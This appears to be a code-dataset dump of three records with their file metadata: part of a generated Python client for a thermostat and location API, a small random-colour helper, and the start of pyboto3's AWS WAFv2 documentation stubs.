raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'update_thermostat' is set
if ('update_thermostat' not in local_var_params or
local_var_params['update_thermostat'] is None):
raise ApiValueError("Missing the required parameter `update_thermostat` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_thermostat' in local_var_params:
body_params = local_var_params['update_thermostat']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_priority_put(self, apikey, user_ref_id, location_id, device_id, update_priority, **kwargs): # noqa: E501
"""Change the room priority settings for a T9/T10 thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_priority_put(apikey, user_ref_id, location_id, device_id, update_priority, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdatePriority update_priority: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_priority_put_with_http_info(apikey, user_ref_id, location_id, device_id, update_priority, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_priority_put_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_priority, **kwargs): # noqa: E501
"""Change the room priority settings for a T9/T10 thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_priority_put_with_http_info(apikey, user_ref_id, location_id, device_id, update_priority, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdatePriority update_priority: (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_priority'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_priority_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'update_priority' is set
if ('update_priority' not in local_var_params or
local_var_params['update_priority'] is None):
raise ApiValueError("Missing the required parameter `update_priority` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_priority' in local_var_params:
body_params = local_var_params['update_priority']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/priority', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_get(self, apikey, user_ref_id, location_id, **kwargs): # noqa: E501
"""Return all thermostats in a particular locationID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_get(apikey, user_ref_id, location_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Thermostat]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_get_with_http_info(apikey, user_ref_id, location_id, **kwargs) # noqa: E501
def v2_devices_thermostats_get_with_http_info(self, apikey, user_ref_id, location_id, **kwargs): # noqa: E501
"""Return all thermostats in a particular locationID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_get_with_http_info(apikey, user_ref_id, location_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Thermostat], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Thermostat]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_locations_get(self, apikey, user_ref_id, **kwargs): # noqa: E501
"""Get all locations, this will also return all devices within those locations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_locations_get(apikey, user_ref_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Location]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_locations_get_with_http_info(apikey, user_ref_id, **kwargs) # noqa: E501
def v2_locations_get_with_http_info(self, apikey, user_ref_id, **kwargs): # noqa: E501
"""Get all locations, this will also return all devices within those locations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_locations_get_with_http_info(apikey, user_ref_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Location], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_locations_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_locations_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_locations_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/locations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Location]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
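# A hedged usage sketch (not part of the generated client): constructing the client
# with the default ApiClient and issuing one synchronous and one asynchronous call.
# The apikey and user_ref_id values are placeholders, and the bearer-token
# configuration of ApiClient that real calls require is omitted here.
def _example_list_locations():
    api = DefaultApi(api_client=ApiClient())
    # Synchronous call: returns list[Location].
    locations = api.v2_locations_get(apikey='YOUR_CLIENT_ID', user_ref_id='YOUR_USER_ID')
    # Asynchronous call: returns a thread; .get() blocks until the result is ready.
    thread = api.v2_locations_get(apikey='YOUR_CLIENT_ID', user_ref_id='YOUR_USER_ID',
                                  async_req=True)
    return locations, thread.get()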
| 51.935146
| 171
| 0.638248
| 6,022
| 49,650
| 4.956659
| 0.034706
| 0.049851
| 0.080673
| 0.03109
| 0.972294
| 0.968676
| 0.967168
| 0.964488
| 0.961707
| 0.951992
| 0
| 0.01395
| 0.286767
| 49,650
| 955
| 172
| 51.989529
| 0.828956
| 0.411098
| 0
| 0.75817
| 1
| 0
| 0.255285
| 0.07929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03268
| false
| 0
| 0.010893
| 0
| 0.076253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a21175e91b472ed17f57ac76113c65fc04a5b0b
| 83
|
py
|
Python
|
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | 7
|
2018-01-14T03:30:35.000Z
|
2021-06-28T12:44:14.000Z
|
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | null | null | null |
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | 2
|
2018-07-27T12:00:56.000Z
|
2020-12-09T03:31:19.000Z
|
import random
def random_colour():
return random.randint(0x000000, 0xFFFFFF)
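# A hedged usage sketch (not from the original repository): random_colour() returns
# an int in the 24-bit RGB range, shown here formatted as a hex colour string.
if __name__ == '__main__':
    print('#{:06X}'.format(random_colour()))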
| 13.833333
| 45
| 0.759036
| 10
| 83
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.156627
| 83
| 5
| 46
| 16.6
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192771
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
5a250df0c5a9553b8b5b7f8794ef9bf62cb8b383
| 631,652
|
py
|
Python
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def associate_web_acl(WebACLArn=None, ResourceArn=None):
"""
Associates a Web ACL with a regional application resource, to protect the resource. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
For AWS CloudFront, don\'t use this call. Instead, use your CloudFront distribution configuration. To associate a Web ACL, in the CloudFront call UpdateDistribution , set the web ACL ID to the Amazon Resource Name (ARN) of the Web ACL. For information, see UpdateDistribution .
See also: AWS API Documentation
Exceptions
:example: response = client.associate_web_acl(
WebACLArn='string',
ResourceArn='string'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.\n
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to associate with the web ACL.\nThe ARN must be in one of the following formats:\n\nFor an Application Load Balancer: ``arn:aws:elasticloadbalancing:region :account-id :loadbalancer/app/load-balancer-name /load-balancer-id ``\nFor an Amazon API Gateway stage: ``arn:aws:apigateway:region ::/restapis/api-id /stages/stage-name ``\n\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
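# Illustrative sketch (not part of the original module): how the operation
# documented above is typically invoked with the real boto3 client rather
# than this stub. Account IDs and ARNs below are placeholders.
def _example_associate_web_acl():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    client.associate_web_acl(
        WebACLArn='arn:aws:wafv2:us-east-1:123456789012:regional/webacl/example-acl/a1b2c3d4',
        ResourceArn='arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/example-alb/50dc6c495c0c9188',
    )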
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
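# Illustrative sketch (not part of the original module): can_paginate() only
# reports whether boto3 ships a paginator for an operation; it does not call
# the service. The operation name below is an example.
def _example_can_paginate():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    if client.can_paginate('list_web_acls'):
        for page in client.get_paginator('list_web_acls').paginate(Scope='REGIONAL'):
            print(page)
    else:
        print('No built-in paginator; page manually with NextMarker.')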
def check_capacity(Scope=None, Rules=None):
"""
Returns the web ACL capacity unit (WCU) requirements for a specified scope and set of rules. You can use this to check the capacity requirements for the rules you want to use in a RuleGroup or WebACL .
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
See also: AWS API Documentation
Exceptions
:example: response = client.check_capacity(
Scope='CLOUDFRONT'|'REGIONAL',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
]
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Rules: list
:param Rules: [REQUIRED]\nAn array of Rule that you\'re configuring to use in a rule group or web ACL.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, 